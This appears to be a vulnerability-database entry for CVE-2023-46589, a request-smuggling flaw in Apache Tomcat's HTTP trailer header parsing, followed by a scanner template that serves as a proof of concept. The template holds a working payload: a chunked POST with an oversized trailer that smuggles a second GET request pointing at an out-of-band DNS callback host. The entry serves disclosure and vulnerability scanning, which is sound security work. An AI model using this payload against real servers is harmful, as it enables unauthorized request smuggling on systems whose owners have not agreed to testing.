Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
PoC代码[已公开]
id: CVE-2023-46589
info:
name: Apache Tomcat - Request Smuggling
author: zan8in
severity: high
verified: false
description: |-
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
reference:
- https://hackerone.com/reports/2280391
- https://github.com/ir3shio/nuclei/blob/e9cb41056444f8ba4f04fff285d1dafedb09f3bc/cve/CVE-2023-46589.yaml
- https://nvd.nist.gov/vuln/detail/CVE-2023-46589
tags: cve,cve2023,tomcat,smuggling
created: 2024/02/02
set:
payload: repeat("a",8179)
oob: oob()
oobDNS: oob.DNS
rules:
r0:
request:
method: POST
path: /examples/test.jsp
body: |-
5
foo=b
2
ar
0
testtrailer: {{payload}}
a: GET /examples/?this_is_attack HTTP/1.1
Host: {{oobDNS}}
expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()